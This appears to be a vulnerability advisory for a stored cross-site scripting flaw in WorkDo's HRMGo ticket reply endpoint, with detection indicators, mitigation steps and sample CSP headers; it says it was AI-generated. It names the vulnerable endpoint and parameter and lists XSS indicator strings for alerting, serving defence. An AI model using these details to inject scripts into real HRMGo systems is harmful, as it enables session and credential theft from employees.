CVE-2025-40975 Overview
A Stored Cross-Site Scripting (XSS) vulnerability has been identified in WorkDo's HRMGo application. The vulnerability stems from a lack of proper validation of user input when processing POST requests to the /hrmgo/ticket/changereply endpoint via the description parameter. This allows authenticated attackers to inject malicious scripts that are persistently stored and executed when other users view the affected ticket replies.
Critical Impact
Attackers can inject persistent malicious scripts into ticket replies, potentially compromising other users' sessions, stealing credentials, or performing unauthorized actions on behalf of victims.
Affected Products
- WorkDo HRMGo (Human Resource Management Application)
Discovery Timeline
- 2026-01-12 - CVE CVE-2025-40975 published to NVD
- 2026-01-13 - Last updated in NVD database
Technical Details for CVE-2025-40975
Vulnerability Analysis
This stored XSS vulnerability (CWE-79) exists in WorkDo's HRMGo human resource management application. The application fails to properly sanitize or encode user-supplied input in the description parameter when handling ticket reply modifications. When an authenticated user submits a POST request to /hrmgo/ticket/changereply, the application stores the raw, unsanitized content in the database. This malicious content is then rendered without proper output encoding when other users view the ticket, causing the injected script to execute in their browser context.
Stored XSS vulnerabilities are particularly dangerous because the malicious payload persists on the server side, affecting all users who subsequently view the compromised content without requiring any direct interaction with the attacker.
Root Cause
The root cause of this vulnerability is improper input validation and output encoding in the ticket reply functionality. The application does not sanitize the description parameter before storing it in the database, nor does it properly encode the content when rendering it back to users. This violates the security principle of treating all user input as untrusted and ensuring proper context-aware output encoding.
Attack Vector
The attack leverages network-based access, requiring the attacker to have authenticated access to the HRMGo application. The attacker crafts a malicious POST request to the /hrmgo/ticket/changereply endpoint, embedding JavaScript code within the description parameter. Once stored, any user viewing the ticket reply will have the malicious script execute in their browser session.
The attack requires low privileges (authenticated user access) and some user interaction (victim must view the affected ticket). Upon successful exploitation, attackers can potentially steal session tokens, redirect users to malicious sites, modify displayed content, or perform actions on behalf of the victim user.
Detection Methods for CVE-2025-40975
Indicators of Compromise
- Unusual JavaScript code patterns in ticket reply descriptions within the HRMGo database
- POST requests to /hrmgo/ticket/changereply containing script tags or JavaScript event handlers in the description parameter
- Unexpected outbound network connections from user browsers after viewing ticket replies
- User reports of suspicious behavior when accessing the ticket system
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect and block common XSS payloads in POST requests to /hrmgo/ticket/changereply
- Deploy content security policy (CSP) headers to detect and report inline script execution attempts
- Monitor application logs for suspicious patterns in the description parameter values
- Conduct regular database audits to identify stored XSS payloads in ticket reply content
Monitoring Recommendations
- Enable detailed logging for all POST requests to the /hrmgo/ticket/changereply endpoint
- Configure alerting for requests containing common XSS indicators such as <script>, javascript:, or event handlers like onerror and onload
- Implement real-time monitoring of CSP violation reports to identify exploitation attempts
- Review web server access logs for anomalous activity patterns targeting the ticket functionality
How to Mitigate CVE-2025-40975
Immediate Actions Required
- Review and audit existing ticket replies in the database for potentially malicious content
- Implement input validation to restrict or encode special characters in the description parameter
- Apply output encoding when rendering ticket reply content to prevent script execution
- Consider temporarily restricting access to the ticket reply functionality until a patch is applied
Patch Information
Refer to the INCIBE Security Notice for official vendor guidance and patch availability. Organizations should contact WorkDo directly for updated versions that address this vulnerability.
Workarounds
- Implement a Web Application Firewall (WAF) with rules to filter XSS payloads in requests to the affected endpoint
- Deploy strict Content Security Policy (CSP) headers to prevent inline script execution
- Manually sanitize existing database entries in the ticket reply table to remove any stored malicious content
- Restrict access to the ticket system to trusted users until the vulnerability is patched
# Example Content Security Policy header configuration
# Add to web server configuration to help mitigate XSS impact
# Apache (.htaccess or httpd.conf)
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'self';"
# Nginx (nginx.conf)
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'self';";
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
